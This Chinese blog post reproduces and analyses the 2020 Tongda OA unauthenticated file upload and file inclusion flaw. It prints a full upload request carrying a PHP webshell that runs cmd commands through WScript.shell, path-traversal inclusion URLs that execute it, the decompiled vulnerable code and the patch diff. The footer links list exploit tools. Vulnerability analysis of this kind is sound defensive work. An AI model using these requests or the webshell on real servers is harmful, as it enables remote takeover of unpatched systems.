通达 oa php 文件 乱,通达(tongda)OA文件上传和文件包含漏洞重现及分析

最新推荐文章于 2024-07-29 18:16:17 发布
最新推荐文章于 2024-07-29 18:16:17 发布
阅读量1.4k 收藏
点赞数
文章标签: 通达 oa php 文件 乱

0x00 概述

20200317,网上爆出通达oa被利用0day中勒索病毒的消息,官方已出漏洞补丁。

该0day为利用文件上传和文件包含组合利用进行RCE,无须认证。

0x01 影响范围

2013,2013增强版,2015,2016,2017,v11

//补丁只看见v11(2020)有geteway.php(文件包含漏洞)补丁

0x02 漏洞重现

利用v11版本:

文件包含漏洞

http://localhost/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.access.log

e497448c9f7785e4acd452a18d3f97e5.png

文件上传漏洞

上传文件路径在非webroot目录,如:

“D:\MYOA\attach\im\2003\ddd.test.jpg”

请求数据包:

POST /ispirit/im/upload.php HTTP/1.1

Host: 127.0.0.1

Connection: close

Accept-Encoding: gzip, deflate

Accept: */*

User-Agent: python-requests/2.20.0

Content-Length: 633

Content-Type: multipart/form-data; boundary=ee65cd98fdbee896acd30a7b2552b6b5

--ee65cd98fdbee896acd30a7b2552b6b5

Content-Disposition: form-data; name="P"

x

--ee65cd98fdbee896acd30a7b2552b6b5

Content-Disposition: form-data; name="UPLOAD_MODE"

1

--ee65cd98fdbee896acd30a7b2552b6b5

Content-Disposition: form-data; name="DEST_UID"

1

--ee65cd98fdbee896acd30a7b2552b6b5

Content-Disposition: form-data; name="ATTACHMENT"; filename="test07.jpg"

Content-Type: image/jpeg

$command=$_POST['cmd'];

$wsh = new COM('WScript.shell');

$exec = $wsh->exec("cmd /c ".$command);

$stdout = $exec->StdOut();

$stroutput = $stdout->ReadAll();

echo $stroutput;

?>

--ee65cd98fdbee896acd30a7b2552b6b5--

db798fc60616a596177a104afe1aee75.png

再利用文件包含执行php代码

json=%7B%22url%22%3A%22%2Fgeneral%2F..%2F..%2Fattach%2Fim%2F2003%2F1941158481.test07.jpg%22%7D&cmd=whoami

39df8d21beced39a986af9648564aa13.png

或者这样包含也行

http://127.0.0.1/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../attach/im/2003/1044529275.test09.jpg

8a61438000c43450cc3e20d3de34dbda.png

//实测无法直接执行phpinfo();

利用windows的com组件绕过disable_function()

$command=$_POST['cmd'];

$wsh = new COM('WScript.shell');

$exec = $wsh->exec("cmd /c ".$command);

$stdout = $exec->StdOut();

$stroutput = $stdout->ReadAll();

echo $stroutput;

?>

0x03 修复方案

打补丁

0x04 漏洞分析

PHP Zend 5.4解密php文件即可

文件上传漏洞分析

upload.php:5

$P = $_POST['P'];

if (isset($P) || $P != '') {

ob_start();

include_once 'inc/session.php';

session_id($P);

session_start();

session_write_close();

} else {

include_once './auth.php';

}

要有P参数否则会经过auth.php登录验证,不为空即可。

$DEST_UID = $_POST['DEST_UID'];

$dataBack = array();

if ($DEST_UID != '' && !td_verify_ids($ids)) {

$dataBack = array('status' => 0, 'content' => '-ERR ' . _('½ÓÊÕ·½IDÎÞЧ'));

echo json_encode(data2utf8($dataBack));

exit;

}

if (strpos($DEST_UID, ',') !== false) {

} else {

$DEST_UID = intval($DEST_UID);

}

if ($DEST_UID == 0) {

if ($UPLOAD_MODE != 2) {

$dataBack = array('status' => 0, 'content' => '-ERR ' . _('½ÓÊÕ·½IDÎÞЧ'));

echo json_encode(data2utf8($dataBack));

exit;

}

}

要有DEST_UID参数(整数)否则会报接收方ID无效,而且设置0的时候UPLOAD_MODE要设置2。

0993ba014de334b10f3e481334b38593.png

if (1 <= count($_FILES)) {

if ($UPLOAD_MODE == '1') {

if (strlen(urldecode($_FILES['ATTACHMENT']['name'])) != strlen($_FILES['ATTACHMENT']['name'])) {

$_FILES['ATTACHMENT']['name'] = urldecode($_FILES['ATTACHMENT']['name']);

}

}

$ATTACHMENTS = upload('ATTACHMENT', $MODULE, false);

进入upload()

utility_file.php:1321

if ($ATTACH_ERROR == UPLOAD_ERR_OK) {

if (!is_uploadable($ATTACH_NAME)) {

$ERROR_DESC = sprintf(_('½ûÖ¹ÉÏ´«ºó׺ÃûΪ[%s]µÄÎļþ'), substr($ATTACH_NAME, strrpos($ATTACH_NAME, '.') + 1));

}

进入is_uploadable()

function is_uploadable($FILE_NAME)

{

$POS = strrpos($FILE_NAME, '.');

if ($POS === false) {

$EXT_NAME = $FILE_NAME;

} else {

if (strtolower(substr($FILE_NAME, $POS + 1, 3)) == 'php') {

return false;

}

$EXT_NAME = strtolower(substr($FILE_NAME, $POS + 1));

}

2f0582a23ec4556467bc3d8e8cd69c81.png

只判断了.php,利用windows特性php.即可绕过,或者利用文件包含直接传jpg即可。

$MSG_CATE = $_POST['MSG_CATE'];

if ($MSG_CATE == 'file') {

$CONTENT = '[fm]' . $ATTACHMENT_ID . '|' . $ATTACHMENT_NAME . '|' . $FILE_SIZE . '[/fm]';

} else {

if ($MSG_CATE == 'image') {

$CONTENT = '[im]' . $ATTACHMENT_ID . '|' . $ATTACHMENT_NAME . '|' . $FILE_SIZE . '[/im]';

} else {

$DURATION = intval($DURATION);

$CONTENT = '[vm]' . $ATTACHMENT_ID . '|' . $ATTACHMENT_NAME . '|' . $DURATION . '[/vm]';

}

}

......

$dataBack = array('status' => 1, 'content' => $CONTENT, 'file_id' => $FILE_ID);

echo json_encode(data2utf8($dataBack));

exit;

75efce18754c56c95d616bff924579ec.png

即可返回文件名

文件包含漏洞分析

gateway.php:

if ($P != '') {

if (preg_match('/[^a-z0-9;]+/i', $P)) {

echo _('·Ç·¨²ÎÊý');

exit;

}

session_id($P);

session_start();

session_write_close();

if ($_SESSION['LOGIN_USER_ID'] == '' || $_SESSION['LOGIN_UID'] == '') {

echo _('RELOGIN');

exit;

}

}

让P参数为空即可

if ($json) {

$json = stripcslashes($json);

$json = (array) json_decode($json);

foreach ($json as $key => $val) {

if ($key == 'data') {

$val = (array) $val;

foreach ($val as $keys => $value) {

${$keys} = $value;

}

}

if ($key == 'url') {

$url = $val;

}

}

if ($url != '') {

if (substr($url, 0, 1) == '/') {

$url = substr($url, 1);

}

if (strpos($url, 'general/') !== false || strpos($url, 'ispirit/') !== false || strpos($url, 'module/') !== false) {

include_once $url;

}

}

exit;

}

解析json数据,如果有键值url就赋值给$url。

if (strpos($url, 'general/') !== false || strpos($url, 'ispirit/') !== false || strpos($url, 'module/') !== false) {

include_once $url;

}

接着就包含了$url。

补丁对比

gateway.php增加了路径判断:

if (strpos($url, '..') !== false) {

echo _('ERROR URL');

exit;

}

upload.php去掉了else分支

$P = $_POST['P'];

if (isset($P) || $P != '') {

ob_start();

include_once 'inc/session.php';

session_id($P);

session_start();

session_write_close();

}

include_once './auth.php';

一定要经过auth.php登录验证了。

0x05 结语

这个漏洞利用简单,危害挺大

只有v11有gateway.php补丁,其他版本可能要利用其他包含漏洞。

上传漏洞好像通杀全版本,不过是好像是作为附件下载,而且是非web目录,所以即使传了php代码危害也不大。

需要绕过disable_function。

0x06 参考资料

南至挚爱
关注
php源码 通达oa_通达OA远程命令执行漏洞分析
weixin_32308019的博客
01-04 598
一、漏洞简介通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。3月13日,通达OA在官方论坛发布通告称,近日接到用户反馈遭到勒索病毒攻击,攻击者通过构造恶意请求,上传webshell等恶意文件,并对入侵的服务器进行文件加密,勒索高额匿名货币赎金。笔者长期从事二进制漏洞的研究...
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
通达OA_php反编译器
07-26
通达OA_php文件大多是编译过的,此反编译器可完美解决。
漏洞概念/漏洞漏洞-零开始白帽子详细教程
最新发布
2401_84915584的博客
07-29 296
由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!
php源码 通达oa_php做下载文件的实现代码及文件名中码解决方法
weixin_36058685的博客
02-08 220
最近有人问我做下载文件的方法,对于php方法如下:header("Content-Type: application/force-download");header("Content-Disposition: attachment; filename=ins.jpg");readfile("imgs/test_Zoom.jpg");?>第一行代码是强制下载;第二行代码是给下载的内容指定一个名...
通达OA_文件包含漏洞
黑剑
09-08 932
复现靶场:通达2017版漏洞文件:td\webroot\ispirit\interface\gateway.php漏洞地址: /mac/gateway.php漏洞POC:json={“url”:“/general/…/…/mysql5/my.ini”}
tongda_oa_rce:通达oa越权登录+文件上传getshell
03-20
通达OA越权登录+文件上传getshell 用法 点安装-r requirements.txt python tongda.py url.txt:测试url,支持批量 shell.txt:上传成功的webshel​​l cookie.txt:登录成功的cookie webshel​​l密码a 已测试...
通达OA任意文件上传_文件包含GetShell1
08-03
- 通达OATongda Office Automation)是一款广泛使用的办公自动化系统。在这个特定的案例中,提到的是一个存在于通达OA V11版本的安全漏洞,允许攻击者进行任意文件上传。 2. **任意文件上传漏洞** - 该漏洞使得...
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA header身份认证绕过漏洞利用工具
12-25
通达OA header身份认证绕过漏洞利用脚本,可以检测漏洞是否存在并生成可用的cookie
通达+oa+php+文件+,通达OA文件上传+文件包含get shell复现
weixin_34338129的博客
03-17 1280
一、原理1.文件上传漏洞位置:/ispirit/im/upload.php(1) 身份绕过如果设置了P参数,则跳过auth.php:(2) 文件上传:上传过滤了php,因为通达oa一般使用的是windows,所以可以使用php.绕过。不过由于上传目录不在根目录,所以还是需要进行文件包含。2.文件包含漏洞位置:/ispirit/interface/gateway.php(2013版)/mac/gat...
通达OA2016破解补丁
05-03
1、安装通达OA2016试用版 2、停止所有OA服务,完整备份所有文件及数据库。 3、解压覆盖源文件,启动服务 通达OA二次开发及技术支持 QQ 1610572998 完整版下载地址 http://tongdaoa.blog.163.com/ http://tongdaoa.blog.163.com/blog/static/195145357201731894345271/
通达OA文件上传+文件包含导致远程代码执行漏洞复现
ranuy阮的博客
03-19 4023
漏洞环境搭建 下载通达OA,一路下一步自行安装
mysql漏洞如何打补丁_通达OA-感染勒索病毒漏洞分析
weixin_39771775的博客
11-14 463
No.1声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。No.2引言开篇的首先感谢l1nk3r大佬的帮助。前天看到通达OA官方发...
通达OA未授权任意文件上传文件包含漏洞分析学习
A1andNS's Blog
08-30 3335
今年3月份通达OA爆出了文件上传文件包含漏洞,网络上很多复现和分析的博客,今天我也来试着分析分析,据360灵腾安全实验室判断该漏洞等级为高,利用难度低,威胁程度高,所以可能比较适合代码审计的新手来练练。 0x00 漏洞概述 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。 该漏洞在绕过身份验证的情况下通过文件上传漏洞上传恶意php文件,组合文件包含漏洞最终造成远程代码执
php findstr,通达OA v11.7 一键getshell脚本
weixin_30843121的博客
03-27 349
微信公众号:云剑侠心通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)在文章的顶部先说明,本文章所介绍的内容以及所附带的脚本仅供学习,如果存在有牟利行为,个人负责!!!仅用于学习娱乐,切勿用于非法用途!请于下载后24小时内删除,使用者承担所有法律责任!一个类似于越权的漏洞,但是利用的方式确实比较特殊访问漏洞页面获取phpsessionhttp://x.x.x.x/mobil...
通达oa php漏洞,通达OA前台任意用户登录漏洞
weixin_42407606的博客
03-10 2720
本文由东塔网络安全学院学员---张同学 投稿。1 漏洞描述通达OA是一套使用比较广泛的办公系统。该漏洞因为使用uid作为身份标识,攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。通达OA官方于2020年4月17日发布安全更新。2 影响版本通达OA < 11.5.200417版本通达OA 2017版本3 漏洞原理本次复现为2017版本,则重点分析该版本,但原...
通达+oa+php+文件+,通达OA 任意文件上传+文件包含导致RCE
weixin_30465829的博客
03-17 899
0x00 漏洞描述ispirit/im/upload.php存在绕过登录(任意文件上传漏洞),结合gateway.php处存在的文件包含漏洞,最终导致getshell,或者直接利用日志文件写入shell,然后结合文件包含漏洞getshell0x01 漏洞影响版本通达OA V11版 <= 11.3 20200103通达OA 2017版 <= 10.19 20190522通达OA 2016...
通达OA权限提升漏洞通告
爱国小白帽
04-22 1511
通达OA权限提升漏洞通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年04月22日, 360CERT监测发现 通达OA官方 发布了编号为 11.5.200417 的更新通告,此次更新修复了一枚权限提升漏洞漏洞等级:高危。 通达OA是由北京通达信科科技有限公司研发的一款通用型OA产品,涵盖了个人事务、行政办公、流程审批、知识管...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值